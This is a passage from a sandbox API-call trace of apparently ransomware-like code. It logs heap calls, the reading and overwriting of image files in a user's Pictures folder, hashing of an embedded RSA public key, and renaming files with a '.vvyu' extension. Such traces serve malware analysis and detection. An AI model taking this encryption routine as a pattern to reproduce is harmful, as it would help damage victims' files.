1 [0191.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0191.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0191.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.090] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0191.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3660 | out: hHeap=0x2c0000) returned 1 [0191.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.091] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.092] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.093] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x59bc, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x59bc, lpOverlapped=0x0) returned 1 [0191.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0191.094] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x59c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.094] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.095] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.096] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.096] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.096] CloseHandle (hObject=0x584) returned 1 [0191.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0191.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0191.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0191.098] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\Ooz2bCVbPPEb9WsU.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\ooz2bcvbppeb9wsu.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\Ooz2bCVbPPEb9WsU.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ooz2bcvbppeb9wsu.png.vvyu")) returned 1 [0191.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.099] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0191.102] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe941e920, ftCreationTime.dwHighDateTime=0x1d8a023, ftLastAccessTime.dwLowDateTime=0x6d4d10a0, ftLastAccessTime.dwHighDateTime=0x1d8a029, ftLastWriteTime.dwLowDateTime=0x6d4d10a0, ftLastWriteTime.dwHighDateTime=0x1d8a029, nFileSizeHigh=0x0, nFileSizeLow=0x151e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oQ7roSq7BYOcKq_wI3.gif", cAlternateFileName="OQ7ROS~1.GIF")) returned 1 [0191.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3660 [0191.102] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0191.102] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3660 | out: hHeap=0x2c0000) returned 1 [0191.102] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\oQ7roSq7BYOcKq_wI3.gif") returned=".gif" [0191.102] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\oQ7roSq7BYOcKq_wI3.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\oq7rosq7byockq_wi3.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.103] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=86499) returned 1 [0191.103] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.107] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x151bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.107] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.110] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.110] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x151e3, lpOverlapped=0x0) returned 1 [0191.111] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.111] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.111] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.111] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.112] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.112] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.112] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.112] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.112] GetLastError () returned 0x0 [0191.113] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.113] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.113] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.113] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.113] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x151e0) returned 0x2af5168 [0191.114] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3660 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af36a8 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f90 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fc0 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6020 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fd8 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.114] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0191.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6020 [0191.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0191.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fd8 [0191.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5fc0 [0191.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0191.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0191.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0191.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0191.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.117] GetCurrentThreadId () returned 0x5d8 [0191.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5778 [0191.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0191.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.118] GetCurrentThreadId () returned 0x5d8 [0191.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0191.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0191.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0191.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0191.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6020 [0191.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fc0 [0191.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0191.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fd8 [0191.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fa8 [0191.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6038 [0191.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0191.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6008 [0191.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ff0 [0191.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6050 [0191.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ff0 [0191.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0191.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0191.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fc0 [0191.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: 